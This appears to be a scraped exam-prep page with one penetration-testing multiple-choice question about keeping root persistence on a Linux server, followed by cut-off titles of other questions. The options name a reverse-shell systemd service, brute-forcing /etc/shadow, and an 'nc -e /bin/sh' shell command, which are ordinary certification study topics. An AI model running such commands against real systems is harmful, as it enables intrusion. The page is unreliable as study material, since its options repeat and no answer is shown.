Multiple Choice
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A) Create a one-shot systemd service to establish a reverse shell.
B) Obtain /etc/shadow and brute force the root password. Obtain /etc/shadow and brute force the root password.
C) Run the nc -e /bin/sh <...> command. Run the nc -e /bin/sh <...> command.
D) Move laterally to create a user account on LDAP
Correct Answer:

Verified
Correct Answer:
Verified
Q3: A penetration tester who is doing a
Q4: A penetration tester conducted an assessment on
Q5: A company that requires minimal disruption to
Q6: User credentials were captured from a database
Q7: A penetration tester gains access to a
Q9: Which of the following BEST describes why
Q10: A penetration tester wrote the following script
Q11: Which of the following should a penetration
Q12: A penetration tester discovers that a web
Q13: A penetration tester runs the following command